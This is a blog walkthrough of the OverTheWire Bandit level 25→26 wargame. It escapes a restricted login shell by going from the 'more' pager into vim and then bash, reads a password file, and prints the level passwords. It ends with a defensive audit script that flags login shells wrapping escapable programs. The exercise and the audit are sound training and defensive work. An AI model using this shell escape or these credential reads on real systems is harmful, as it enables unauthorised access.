Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Bandit Level 25 → 26 tutorial!!

Login

Log in as bandit25 using the password you obtained from Level 24 → 25.

ssh bandit25@bandit.labs.overthewire.org -p 2220
# password: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

Why? Each Bandit level is a separate UNIX user. To solve 25 → 26, you must be the bandit25 user.

Task

The home directory contains a private SSH key for bandit26. However, the login shell of bandit26 is set to /usr/bin/showtext, which only runs the pager more on a file and then exits. Your job is to figure out how to break out of this restricted environment and obtain the password for bandit26.

A little bit of Theory

  • Shell override: instead of /bin/bash, bandit26’s shell is /usr/bin/showtext.
  • The script /usr/bin/showtext simply executes more ~/text.txt.
  • Pager trick: when more is interactive (--More--), you can press v to launch vim.
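  • From vim, you can spawn a real shell with :set shell=/bin/bash followed by :shell. A plain :!bash does not work here, because vim runs commands through bandit26’s login shell, /usr/bin/showtext.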

Solution

  1. Inspect the home directory

    ls -la
    

    Why? Confirms the presence of the bandit26.sshkey file needed to connect.

  2. Check the shell of bandit26

    grep '^bandit26:' /etc/passwd
    

    Output shows:

    bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
    

    Why? Confirms that bandit26 does not use /bin/bash but /usr/bin/showtext.

  3. Inspect the showtext script

    cat /usr/bin/showtext
    

    It runs:

    #!/bin/sh
    export TERM=linux
    exec more ~/text.txt
    exit 0
    

    Why? Shows that bandit26 will always be dropped into more ~/text.txt.

  4. Login as bandit26 with the SSH key

    ssh -i bandit26.sshkey -p 2220 bandit26@localhost
    

    Why? Connects using the provided private key instead of a password.

    If your terminal is tall, more prints the whole file and exits immediately. → Fix: resize your terminal to ~10 lines tall so more shows --More--.

  5. Escape into vim, then bash

    • Inside more, press v → this opens vim.
    • In vim, type:

       :set shell=/bin/bash
       :shell
      

    Why? This spawns a new shell, giving you full access as bandit26.

  6. Read the password

    cat /etc/bandit_pass/bandit26
    

    Output:

    s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
    

    Why? Prints the password for the next level.

Password

This is the password I got; copy yours from your own run.

s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

Troubleshooting

  • Immediately disconnected? → Shrink your terminal window so more pauses with --More--.
  • Can’t escape? → Be sure you’re inside more. Press v to open vim, then run :set shell=/bin/bash and :shell.
  • Permission errors on ssh key → Ignore; key is already properly restricted.

Congrats 🎉 You successfully escaped a restricted shell using more → vim → bash and obtained the credentials for bandit26!
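
From the defender's side, the same weakness can be audited for. The script below is an added example (not part of the original walkthrough or OverTheWire's own code): it scans a passwd file for login shells that are wrapper scripts launching an interactive program with a known shell or editor escape. The ESCAPABLE list, the function names and the fixture are assumptions made for the illustration.

```sh
#!/bin/sh
# Added example: flag accounts whose login "shell" is a wrapper script that
# starts an interactive program with a built-in shell or editor escape.

# Programs treated as escapable here (an assumption; extend as needed).
ESCAPABLE='more|less|man|vi|vim|view|ed'

# audit_login_shells PASSWD_FILE [ROOT]
# Prints "user:shell:program" per risky entry. ROOT is an optional path
# prefix so the check can run against a mounted image or a test fixture.
# Heuristic: only matches a program named at the start of a script line.
audit_login_shells() {
    passwd_file=$1
    root=${2:-}
    while IFS=: read -r user _ _ _ _ _ shell; do
        case "$shell" in
            ''|*/nologin|*/false) continue ;;
        esac
        path="$root$shell"
        [ -f "$path" ] || continue
        # Inspect wrapper scripts only; compiled shells lack a "#!" line.
        first=''
        IFS= read -r first < "$path" || true
        case "$first" in
            '#!'*) ;;
            *) continue ;;
        esac
        prog=$(sed -nE "s/^[[:space:]]*(exec[[:space:]]+)?($ESCAPABLE)([[:space:]].*)?\$/\2/p" "$path" | head -n 1)
        if [ -n "$prog" ]; then
            printf '%s:%s:%s\n' "$user" "$shell" "$prog"
        fi
    done < "$passwd_file"
    return 0
}

# Constructed fixture: two passwd lines and a copy of the showtext script.
make_fixture() {
    dir=$(mktemp -d)
    mkdir -p "$dir/usr/bin" "$dir/bin"
    printf '#!/bin/sh\nexport TERM=linux\nexec more ~/text.txt\nexit 0\n' \
        > "$dir/usr/bin/showtext"
    printf 'not-a-script\n' > "$dir/bin/bash"
    cat > "$dir/passwd" <<'EOF'
bandit25:x:11025:11025:bandit level 25:/home/bandit25:/bin/bash
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
EOF
    printf '%s\n' "$dir"
}
```

On a live host, call audit_login_shells /etc/passwd with no second argument; against the fixture it reports bandit26 and leaves bandit25 alone.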


Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨
